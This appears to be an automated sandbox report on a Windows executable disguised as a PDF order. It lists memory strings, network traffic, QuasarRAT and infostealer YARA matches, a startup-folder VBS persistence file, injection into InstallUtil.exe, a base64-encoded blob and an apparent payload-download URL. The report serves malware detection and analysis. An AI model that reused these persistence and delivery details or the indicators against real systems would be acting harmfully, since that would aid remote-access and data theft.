                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping.
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mappingGMore
                    Source: Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drString found in binary or memory: https://dapper-plus.net/pricing.
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/)
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/include-graph).
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/md5-exception
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/md5-exceptionX
                    Source: Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drString found in binary or memory: https://entityframework-extensions.net/pricing.
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004EBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215VSELECT
                    Source: InstallUtil.exe, 00000001.00000002.2919597107.0000000002ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2919597107.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
                    Source: Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drString found in binary or memory: https://linqtosql-plus.net/pricing.
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2919597107.000000000290C000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr/slim/Wyaiccfynhd.mp3
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.4:49734 version: TLS 1.2

                    E-Banking Fraud

                    barindex
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1861458458.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3624, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3632, type: MEMORYSTR

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Order88983273293729387293828PDF.exe
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00DFF9D00_2_00DFF9D0
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00DFDDF00_2_00DFDDF0
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00DFDE000_2_00DFDE00
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_047F5A180_2_047F5A18
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_047F5A080_2_047F5A08
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072EE5280_2_072EE528
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072D001F0_2_072D001F
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072D00400_2_072D0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0268EFE41_2_0268EFE4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_078CA7101_2_078CA710
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_078C6D881_2_078C6D88
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_032741203_2_03274120
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_0327F9D03_2_0327F9D0
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_0327DE003_2_0327DE00
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_0327DDF03_2_0327DDF0
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_0546597F3_2_0546597F
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_07F1E5283_2_07F1E528
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_07F000403_2_07F00040
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeCode function: 3_2_07F000063_2_07F00006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0164F03C5_2_0164F03C
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1734653800.0000000004810000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePjpeajx.exe0 vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePjpeajx.exe0 vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002B6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1714381177.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exeBinary or memory string: OriginalFilenamePjpeajx.exe0 vs Order88983273293729387293828PDF.exe
                    Source: Order88983273293729387293828PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: Order88983273293729387293828PDF.exe, -.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Order88983273293729387293828PDF.exe.38d0890.6.raw.unpack, -.csCryptographic APIs: 'CreateDecryptor'
                    Source: Order88983273293729387293828PDF.exe, -.csBase64 encoded string: 'iHuxp8Ap9VCntckhuHarvMtqmnGxtsgmt3v5lMAwnmy2odwFqHGnvscoojmlttEbnXeuv+sltmf5vNUbkmynotAlt2u2qp4jvnadn8AqvHaq6OIhr1a7o8ACqW2vm8Qqv26n6MIhr12Mssgh4Eust8A8lGT5gcAlv1G2ocwqvDmDt8F/vGe2jPUrqGu2usoq4GWnp/oHrnCwtsswn22vsswq4FGnp+Elr2P565d96zmDoNYhtmCuqvYhqXSnoZ4Xsm+yv8AFqHGnvscooke6o8krqWew6McluWeupch/qG+tuMAwvnG2'
                    Source: 0.2.Order88983273293729387293828PDF.exe.38d0890.6.raw.unpack, -.csBase64 encoded string: 'iHuxp8Ap9VCntckhuHarvMtqmnGxtsgmt3v5lMAwnmy2odwFqHGnvscoojmlttEbnXeuv+sltmf5vNUbkmynotAlt2u2qp4jvnadn8AqvHaq6OIhr1a7o8ACqW2vm8Qqv26n6MIhr12Mssgh4Eust8A8lGT5gcAlv1G2ocwqvDmDt8F/vGe2jPUrqGu2usoq4GWnp/oHrnCwtsswn22vsswq4FGnp+Elr2P565d96zmDoNYhtmCuqvYhqXSnoZ4Xsm+yv8AFqHGnvscooke6o8krqWew6McluWeupch/qG+tuMAwvnG2'
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1714381177.0000000000B19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TPConfigSnapshot.snp.VBP
                    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@8/6@3/3
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3302836a-f2f9-4646-981e-42b54ed610dd
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs"
                    Source: Order88983273293729387293828PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Order88983273293729387293828PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT TOP 0 * FROM {0};
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE ROWID = last_insert_rowid();
